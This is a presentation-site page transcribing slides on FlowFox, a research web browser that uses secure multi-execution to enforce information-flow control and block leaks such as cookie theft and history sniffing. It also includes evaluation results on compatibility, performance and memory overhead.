FLOWFOX A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL.

Slides:



Advertisements
Similar presentations
Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.
Advertisements

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.
The Top 10 Reasons Why Federated Can’t Succeed And Why it Will Anyway.
GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
Using Replicated Execution for a More Secure and Reliable Browser Authors: Hui Xue, Nathan Dautenhahn, Samuel T. King University of Illinois at Urbana.
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
1 Perracotta: Mining Temporal API Rules from Imperfect Traces Jinlin Yang David Evans Deepali Bhardwaj Thirumalesh Bhat Manuvir Das.
1 14th ACM Conference on Computer and Communications Security, Alexandria, VA Shuo Chen †, David Ross ‡, Yi-Min Wang † † Internet Services Research Center.
On the Incoherencies in Web Browser Access Control Policies Authors: Kapil Singh, et al Presented by Yi Yang.
The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.
CS 290C: Formal Models for Web Software Lecture 10: Language Based Modeling and Analysis of Navigation Errors Instructor: Tevfik Bultan.
ACTIVE X By Ethan Huang. OUTLINE What is ActiveX? Component of ActiveX Why ActiveX? ActiveX and Java Security Issue.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
XP 1 Working with Cascading Style Sheets Creating a Style for Online Scrapbooks Tutorial 7.
Threads CSCI 444/544 Operating Systems Fall 2008.
Web Same-Origin-Policy Lab Zutao Zhu 11/06/2009. Outline Background Setting SOP.
C++ vs. Java: Similiarities & Differences Dr. Jeyakesavan Veerasamy Director of CS UTDesign program & CS Teaching Faculty University.
Aaron Blankstein and Michael J. Freedman Princeton University Tuan Tran.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Secure Embedded Processing through Hardware-assisted Run-time Monitoring Zubin Kumar.
4.1 JavaScript Introduction
HTML5 Group 3: Dongyang Zhang, Wei Liu, Weizhou He, Yutong Wei, Yuxin Zhu.
CSCE 548 Secure Software Development Risk-Based Security Testing.
VEX: VETTING BROWSER EXTENSIONS FOR SECURITY VULNERABILITIES XIANG PAN.
Secure Virtual Architecture John Criswell, Arushi Aggarwal, Andrew Lenharth, Dinakar Dhurjati, and Vikram Adve University of Illinois at Urbana-Champaign.
PRECIP: Towards Practical and Retrofittable Confidential Information Protection XiaoFeng Wang (IUB), Zhuowei Li (IUB), Ninghui Li (Purdue) and Jong Youl.
Working with Cookies Managing Data in a Web Site Using JavaScript Cookies* *Check and comply with the current legislation regarding handling cookies.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
CNIT 133 Interactive Web Pags – JavaScript and AJAX JavaScript Environment.
JavaScript Tabriz university Its September 1995.
I Do Not Know What You Visited Last Summer: Protecting users from stateful third-party web tracking with TrackingFree browser Xiang Pan §, Yinzhi Cao †,
Client Scripting1 Internet Systems Design. Client Scripting2 n “A scripting language is a programming language that is used to manipulate, customize,
OMash: Enabling Secure Web Mashups via Object Abstractions Steven Crites, Francis Hsu, Hao Chen UC Davis.
document.location ✗ Location Hijacking Phishing.
INTRODUCTION TO JAVASCRIPT AND DOM Internet Engineering Spring 2012.
CSC-682 Cryptography & Computer Security Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Pompi Rotaru Based on an article.
(Business) Process Centric Exchanges
Conceptual Architecture of Mozilla Firefox (version ) Jared Haines Iris Lai John,Chun-Hung,Chiu Josh Fairhead June 5, 2007.
Detecting Targeted Attacks Using Shadow Honeypots Authors: K.G. Anagnostakis, S. Sidiroglou, P. Akritidis, K. Xinidis, E. Markatos, A.D. Keromytis Published:
Securing Class Initialization in Java-like Languages.
Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡
Sahar Mosleh California State University San MarcosPage 1 JavaScript Basic.
GAZELLE THE MULTI-PRINCIPAL OS CONSTRUCTION OF THE GAZELLE WEB BROWSER.
M. Alexander Helen J. Wang Yunxin Liu Microsoft Research 1 Presented by Zhaoliang Duan.
By Adam Barth, Joel Weinberger and Dawn Song.  Current JavaScript Security Model  Cross-Origin JavaScript Capability Leaks  Capability Leak Detection.
Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.
Plug-in Architectures Presented by Truc Nguyen. What’s a plug-in? “a type of program that tightly integrates with a larger application to add a special.
1 Isolating Web Programs in Modern Browser Architectures CS6204: Cloud Environment Spring 2011.
Trevor Jim Nikhil Swamy Michael Hicks Defeating Script Injection Attacks with Browser-Enforced Embedded Policies Jason FroehlichSeptember 24, 2008.
Web Technologies Lecture 6 State preservation. Motivation How to keep user data while navigating on a website? – Authenticate only once – Store wish list.
DeepDroid Dynamically Enforcing Enterprise Policy Manwoong (Andy) Choi
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Jaime Pérez Virginia Martín-Rubio TERENA Networking Conference Prague, May 2011.
Applications Active Web Documents Active Web Documents.
Chapter 4: Feature Detection & Drag and Drop
CSCE 548 Secure Software Development Risk-Based Security Testing
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Static Detection of Cross-Site Scripting Vulnerabilities
Prof. Dr. Marc Rennhard Head of Information Security Research Group
TaintART: A Practical Multi-level Information-Flow Tracking System for Android RunTime Sadiq Basha.
The Top 10 Reasons Why Federated Can’t Succeed
Li Yang, Carson Woods (University of Tennessee at Chattanooga
Modern web applications
Modern web applications
Gain top JIRA performance for financial business processes
Community Awareness Initial Results
WWW安全 國立暨南國際大學 資訊管理學系 陳彥錚.
Access Control What’s New?
Presentation transcript:

FLOWFOX A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL

ROADMAP 1.Background 2.Threat Model 3.Design 4.Security Policies 5.Implementation 6.Evaluation

BACKGROUND same-origin-policy (SOP) has holes 1.Examples to bypass SOP 1.More powerful security enforcement mechanisms are required. XMLHTTPRequest ?

BACKGROUND Information flow control Any program can be seen as a machine with inputs and outputs. Inputs can be classified high credential input and low credential input. The same for output.

BACKGROUND Example for Information flow analysis High Input: document.getElementById(‘emai l.input’).text Low Output: *.src=*

BACKGROUND Noninterference A program is defined to be noninterferent if its outputs cannot be influenced by inputs at a higher security level than their own. Termination-insensitive noninterference 1.A version of Noninterference. 2.Under the assumption that a program always terminates normally, information is only disclosed by the program when it terminates. 3.Many existing tools can effectively determine a program as long as the assumption holds

BACKGROUND Termination-insensitive noninterference Vs. Termination- sensitive noninterference

BACKGROUND In Context of web security Many state-of-art information flow systems can detect information leak for this case

BACKGROUND Timing-insensitive noninterference Assumption: the execution result has nothing to do with the execution time

BACKGROUND Secure Multi-Execution ([18]) 1.An information flow control enforcement mechanism 2.As its name suggests, secure multi-execution will execute a program multiple times, once for each security level. 3.SME regime will guarantee non-interference 4.FlowFox implements SME

BACKGROUND Secure Multi-Execution Rule Image.src Document. cookie Document. cookie Image.width

BACKGROUND Example of Secure Multi-Execution

BACKGROUND Secure Multi-Execution Pros: 1. Secure multi-execution is sound: 2. Secure multi-execution is precise Cons: 1. Cost in CPU time and memory use

THREAT MODEL Examples 1.Session Hijacking 2.Malicious Advertisements (Plugins) 3.History Sniffing and Behavior Tracking

FLOWFOX DESIGN Two Design Alternatives 1.Multi-execute entire browser: 1.Easy to implement 2.Too Coarse grained and imprecise

FLOWFOX DESIGN Two Design Alternatives 2. Multi-execute the web scripts (FlowFox) 1.Treat all interactions with the browser API as inputs and outputs 2.Fine grained 3.Hard to implement

SECURITY POLICIES 1.DOM API will be specified policy 2.FlowFox policy specifies two things 1.Security levels to DOM APIs 2.Default value to each DOM API call 3.Policy Rule

SECURITY POLICIES 4. Examples

IMPLEMENTATION 1.Implemented on top of Mozilla Firefox and consists of about 1400 new lines of C/C++ code 2.SME-aware JavaScript Engine 1.JSContext has a security level field 2.Each property of JSObject has a security level field 3.Only properties with the same security level as the coordinating JSContext are visible 3.SME/IO Process 4.Event Handling 1.Low events will be handled by both the low and high executions 2.High events will only be handled by the high execution.

EVALUATION 1.Security 1.Is FlowFox Non-interferent 1.Two reasons FlowFox could fail to be non-interferent 1.Violate the assumptions underlying the soundness proof 2.Exist implementation level vulnerabilities 2.Hard to guarantee.

EVALUATION 1.Security 1.Examples of mitigating threats 1.Leaking Session Cookies 2.History Sniffing 3.Tracking Libraries

EVALUATION 2.Compatibility 1.Two regular FireFox browsers and one FlowFox browser 2.A simple policy that makes reading document.cookie high 3.Crawler dumps a screenshot of each of the three browsers to a bitmap 4.First, compare the bitmaps belonging to two FireFox browsers and find the same area (unmasked area). 5.Second, compare the unmasked areas for bitmaps belonging to FireFox and FlowFox browsers.

EVALUATION 3.Micro Benchmark 1.Measure the overhead of executing pure JavaScript. 2.Measure the overhead for I/O intensive applications. 3.Executing pure JavaScript incurs large overhead 4.IO test shows only a negligible impact overhead

EVALUATION 4.Macro Benchmark 1.Measure the impact on the latency perceived by a browser user 2.The results show that the user-perceived latency for real-life web applications is acceptable

EVALUATION 5.Memory Benchmark 1.Measuring 500 different websites 2.FlowFox incurred a memory overhead of 88%